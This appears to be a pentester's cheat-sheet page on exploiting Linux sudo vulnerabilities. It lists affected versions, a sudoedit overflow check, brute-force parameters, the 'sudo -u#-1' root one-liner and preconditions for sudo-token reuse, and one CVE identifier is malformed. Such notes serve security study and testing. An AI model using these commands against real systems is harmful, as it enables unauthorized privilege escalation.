killchain-compendium/Exploits/Linux/sudo.md

CVE-2021-3156 Baron Samedit

• Animesh Jain's blog post on Qualys
• blasty's PoC
• Heap based overflow
• Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
• Check vulnerability via

sudoedit -s '\' $(python -c "print('\x41' * 10000)")

• Defaults to try

./brute.sh 90 120 50 70 150 300

CVE-2019-14287

• Versions < 1.8.28

Usage

• Integer overflow with resulting root status.

sudo -u#-1 <app>

CVE-18634

• Sudo pwnge with pwfeedback()
• Sudo version 1.7.1 to 1.8.30
• Saleem's github

Reusing Sudo Token

• Reuse sudo token of currently logged in user

• Hacktricks' site

• ptrace has to be fully enabled

cat /proc/sys/kernel/yama/ptrace_scope
0

• sudo has to be triggered the last 15 minutes, check ps wuax
• gdb has to be installed
• One must be logged in as the same user which should be owned
• Use nongiach's exploit

Heap Based Overflow

• CVE-2022-43995

Marco Benatto:

Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains
a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result
in a heap-based buffer over-read. This can be triggered by arbitrary local
users with access to Sudo by entering a password of seven characters or fewer. The impact could vary depending on the compiler and processor architecture.